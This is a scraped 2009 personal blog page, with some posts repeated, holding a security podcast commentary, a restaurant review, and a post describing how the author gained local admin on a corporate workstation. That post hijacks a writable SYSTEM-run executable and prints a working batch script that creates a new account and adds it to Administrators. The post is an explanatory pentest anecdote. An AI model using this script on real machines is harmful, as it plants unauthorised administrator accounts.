I enjoyed listening to the last two @exoticliability podcasts from @indi303 and Ryan Jones.
Podcast #37 covered intel gathering for clients, leaky strippers, and leaky consultants saying stupid things on social networks. Having worked with a couple firms in the past and doing some pentesting, I somewhat agree on their general opinion with information / intelligence gathering during a pentest. In both firms I worked with, information gathering usually received 10% of the budget for the engagement. This was a management decision of the firms, although I'm sure flexible.
Looking back, if I was in a management position, I think I would have been cautious on moving the 10% level higher across the board until I saw the value proposition in the results. If we have been doing X and X has been working, why fix it? To be honest, though, the thought of doing greater than 10% of information gathering never crossed any of our minds. That in and of itself, is probably an issue. Why not do 25, 50, or 75% of the engagement as information gathering (or some other component)? And this goes to a bigger question, what is the right amount for any phase of the engagement? Constraints, such as target scope, types of tests, etc., would play heavily into this, of course. Still, we treat these numbers as sacred and they aren't.
#37 also talked about data leakage. Chris brought up an example of someone leaking the data center location of a possible client. I got two thoughts on this: the knowledge of a data center location should not decrease its security and if the client thinks the secret is important, it is important. I don't use foursquare, but, yeah, tweeting your location whilst at a client is stupid. I disabled my twitter clients from announcing this data a while ago, because, seriously, anyone needing to know where I'm at is just going to call me. They are not going to look up my longitude and latitude on Twitter, paste that into Google Maps, and then call me. Building on my thoughts above, though, sensitive data is perceived to be important by the client, regardless of its actual importance to reality. In our last paychecks, our clients paid our wage in some way, shape or form. Tomorrow, they might not if you don't care about them.
Tuesday, October 27, 2009
Thursday, October 15, 2009
Easy is Cheesy
I received a brand-new, corporate-blessed workstation last week. Since I have a little downtime at my new client, I poked around at the system. The workstation is based on a standard build, with some security tools installed. My account is not part of the local Administrators group (Windows-based OS), so I am limited in what can be installed. My goal was to obtain local admin privileges, which took about 4 hours to achieve.
Usually, on a new system, I like to figure out what's already existing in log files and such. The system had a bunch of automated install files from the image creation and subsequent updates. Out of all the files I parsed, only one had password information in it. The passwords were redacted, though, via a '****' substitution. Not too shabby. The second method was to enumerate file permissions and see if there was an easy way in via a script or automated task. This was the basic vector I used to elevate privileges.
I noticed files like win.ini and system.ini were wide open to any user to modify. Unfortunately, this version of Windows does not utilized these files in any way I found to execute a file (such as the [windows] run= directive in win.ini). I spent way too much time here, trying to see if my old Win 3.1.1 skills could be of some use :-) Some other files also had weak permissions, but none of them were either in use or going to be assumed to be in use in the foreseeable future. But, here's where it gets funny: many files in Program Files had "BUILTIN\Users:C" or "Everyone:F" (via xcacls.exe).
Pulling up Task Manager showed a list of programs that ran as SYSTEM. The 'exploit' was just replacing (rename, copy) an executable with something that would do a nefarious task. Being ol' school, I whipped up the following batch file and converted it to an EXE:
Pretty simple. Once converted, I just renamed an EXE, copied this EXE to its name, and rebooted the system [1]. Upon reboot, the account was created. The humor of this is the client had a HIDS program installed but only turned on to monitor versus block. The HIDS detected the rogue program and might have prevented such an elementary attack.
Sometimes, easy is cheesy, but also just as valid as an 0-day.
[1] Well, this took a little bit of troubleshooting. The batch to EXE converter acted a bit flaky on error checking (via %ERRORLEVEL%). Instead of checking and using conditionals to log different messages, I just in-lined everything to fire and log.
Usually, on a new system, I like to figure out what's already existing in log files and such. The system had a bunch of automated install files from the image creation and subsequent updates. Out of all the files I parsed, only one had password information in it. The passwords were redacted, though, via a '****' substitution. Not too shabby. The second method was to enumerate file permissions and see if there was an easy way in via a script or automated task. This was the basic vector I used to elevate privileges.
I noticed files like win.ini and system.ini were wide open to any user to modify. Unfortunately, this version of Windows does not utilized these files in any way I found to execute a file (such as the [windows] run= directive in win.ini). I spent way too much time here, trying to see if my old Win 3.1.1 skills could be of some use :-) Some other files also had weak permissions, but none of them were either in use or going to be assumed to be in use in the foreseeable future. But, here's where it gets funny: many files in Program Files had "BUILTIN\Users:C" or "Everyone:F" (via xcacls.exe).
Pulling up Task Manager showed a list of programs that ran as SYSTEM. The 'exploit' was just replacing (rename, copy) an executable with something that would do a nefarious task. Being ol' school, I whipped up the following batch file and converted it to an EXE:
@echo off
SET OURUSER=YYYYY
SET OURPW=XXXXX
SET OURGROUP=Administrators
:VARS
SET NETEXE=%SYSTEMROOT%\SYSTEM32\net.EXE
SET FINDS=%SYSTEMROOT%\SYSTEM32\findstr.EXE
SET OUTPUT=%SYSTEMROOT%\TEMP\%OURUSER%.TXT
IF EXIST %OUTPUT% DEL %OUTPUT%
echo [X] Attempting to add user %OURUSER%... >> %OUTPUT%
%NETEXE% user %OURUSER% %OURPW% /ADD >> %OUTPUT%
echo [X] Checking user creation... >> %OUTPUT%
%NETEXE% user | %FINDS% "%OURUSER%" >> %OUTPUT%
echo [X] Attempting to add user %OURUSER% to group %OURGROUP%... >> %OUTPUT%
net localgroup %OURGROUP% %OURUSER% /ADD >> %OUTPUT%
echo [X] Checking group addition... >> %OUTPUT%
net localgroup %OURGROUP% | %FINDS% "%OURUSER%" >> %OUTPUT%
Pretty simple. Once converted, I just renamed an EXE, copied this EXE to its name, and rebooted the system [1]. Upon reboot, the account was created. The humor of this is the client had a HIDS program installed but only turned on to monitor versus block. The HIDS detected the rogue program and might have prevented such an elementary attack.
Sometimes, easy is cheesy, but also just as valid as an 0-day.
[1] Well, this took a little bit of troubleshooting. The batch to EXE converter acted a bit flaky on error checking (via %ERRORLEVEL%). Instead of checking and using conditionals to log different messages, I just in-lined everything to fire and log.
Wednesday, October 07, 2009
Fish & Chips! The Anchor is Open
So, Northeast has a new fish & chips spot, The Anchor Fish & Chips. I love local businesses, especially when it comes to bars, pubs, and restaurants. I'm not a big foodie at all. I like White Castle for some things, Red Stag Supper Club for others. It's all about mood for me. Whatever that means...
I'm not a food reviewer, so don't expect a lot of multi-syllabled words. Expect more of Uncle Walt Whitman here. Go see the building if you like that sort of stuff. It works for the neighborhood. Also, experience the service yourself, it may have been better than it was for me. I'm about food and beer.
The meal, when it came out, was moderately good (3 out of 5). The chips themselves were awesome! The salt, golden to amber color, and crisp to mash-like filing made the chips very tasty. The fish also was good, but the chips were more memorable to me. The fish batter was somewhat light, sometimes being a bit greasy. If it wasn't a little greasy, I'd probably walk out because the damn thing just came out of a hot fryer, regardless of the time it spent under the hot lights. Being silly, I thought it was an English fish & chips spot, so I was again saddened to not see any peas (mushy or otherwise) w/ the meal. But, it's not English, it's Irish. I guess the Irish don't like their mushy peas with fish, so they put them on the side for $2.50. (Maybe peas are Protestant or something, who knows...)
Selfish Recommendation #1: throw just a bit of mushy peas in the basket for a week and see if people comment one way or the other. Let me know when you do this so I can be cheap and get some for free. ;-)
The only annoyance I had was with one of the Governors (the thin boy that needs to eat more). I asked for some malt vinegar and I was almost ran out of the bar. He educated me on how people that use malt vinegar are Neanderthal at best and Iowans at worst. Malt vinegar doesn't bring out the flavor of anything and only overshadows the chips, he continued. And, white vinegar is God's food or something, with an astringency that truly works with the chip. I should have called bullshit or something.
Prior to this, I did realize they had white vinegar on the counter. I tried a couple drops on my finger prior, to see if I would like it. I_didn't_taste_anything. I tried again, and got the faintest vinegar taste, with a little bit of sourness. I passed this observation to the Guv, but I think at this time he thought I probably was from Iowa. I proceeded to create a swimming pool of vinegar in my basket when the meal came out, but all for naught. (Maybe it had something to do with the vinegar being Heinz.)
I felt like an idiot, wondering if my years of malt vinegar have destroyed my inexperienced palate. I then felt like I was duped, wondering if there was a camera somewhere recording my expressions, which should be on Youtube by now or something. The Guv stated that only true fish & chip connoisseurs have the balls to douse their meal with God's white vinegar. I really wanted to throw the bottle at him, but that would have ended the meal on an unfortunate note. And, I still thought there was a camera somewhere, even though I cased out the spot over and over.
Unselfish Recommendation #1: Don't make fun of your customers, unless they are from Iowa. I'll probably try out the spot again, but I really felt like an idiot. Having molten cheese spill on your fingers or burn your lips because you didn't listen to Renee at Matt's proves you're an idiot. Being made fun of never having a Jucy Lucy and not knowing how to tackle one makes you feel like an idiot. That was the whole vinegar thing for me. There's a subtle difference here, but one is mea culpa and the other is tua culpa. Figure that out, and you'll be a better Guv, Guv.
I'm not a food reviewer, so don't expect a lot of multi-syllabled words. Expect more of Uncle Walt Whitman here. Go see the building if you like that sort of stuff. It works for the neighborhood. Also, experience the service yourself, it may have been better than it was for me. I'm about food and beer.
The meal, when it came out, was moderately good (3 out of 5). The chips themselves were awesome! The salt, golden to amber color, and crisp to mash-like filing made the chips very tasty. The fish also was good, but the chips were more memorable to me. The fish batter was somewhat light, sometimes being a bit greasy. If it wasn't a little greasy, I'd probably walk out because the damn thing just came out of a hot fryer, regardless of the time it spent under the hot lights. Being silly, I thought it was an English fish & chips spot, so I was again saddened to not see any peas (mushy or otherwise) w/ the meal. But, it's not English, it's Irish. I guess the Irish don't like their mushy peas with fish, so they put them on the side for $2.50. (Maybe peas are Protestant or something, who knows...)
Selfish Recommendation #1: throw just a bit of mushy peas in the basket for a week and see if people comment one way or the other. Let me know when you do this so I can be cheap and get some for free. ;-)
The only annoyance I had was with one of the Governors (the thin boy that needs to eat more). I asked for some malt vinegar and I was almost ran out of the bar. He educated me on how people that use malt vinegar are Neanderthal at best and Iowans at worst. Malt vinegar doesn't bring out the flavor of anything and only overshadows the chips, he continued. And, white vinegar is God's food or something, with an astringency that truly works with the chip. I should have called bullshit or something.
Prior to this, I did realize they had white vinegar on the counter. I tried a couple drops on my finger prior, to see if I would like it. I_didn't_taste_anything. I tried again, and got the faintest vinegar taste, with a little bit of sourness. I passed this observation to the Guv, but I think at this time he thought I probably was from Iowa. I proceeded to create a swimming pool of vinegar in my basket when the meal came out, but all for naught. (Maybe it had something to do with the vinegar being Heinz.)
I felt like an idiot, wondering if my years of malt vinegar have destroyed my inexperienced palate. I then felt like I was duped, wondering if there was a camera somewhere recording my expressions, which should be on Youtube by now or something. The Guv stated that only true fish & chip connoisseurs have the balls to douse their meal with God's white vinegar. I really wanted to throw the bottle at him, but that would have ended the meal on an unfortunate note. And, I still thought there was a camera somewhere, even though I cased out the spot over and over.
Unselfish Recommendation #1: Don't make fun of your customers, unless they are from Iowa. I'll probably try out the spot again, but I really felt like an idiot. Having molten cheese spill on your fingers or burn your lips because you didn't listen to Renee at Matt's proves you're an idiot. Being made fun of never having a Jucy Lucy and not knowing how to tackle one makes you feel like an idiot. That was the whole vinegar thing for me. There's a subtle difference here, but one is mea culpa and the other is tua culpa. Figure that out, and you'll be a better Guv, Guv.
Subscribe to:
Posts (Atom)
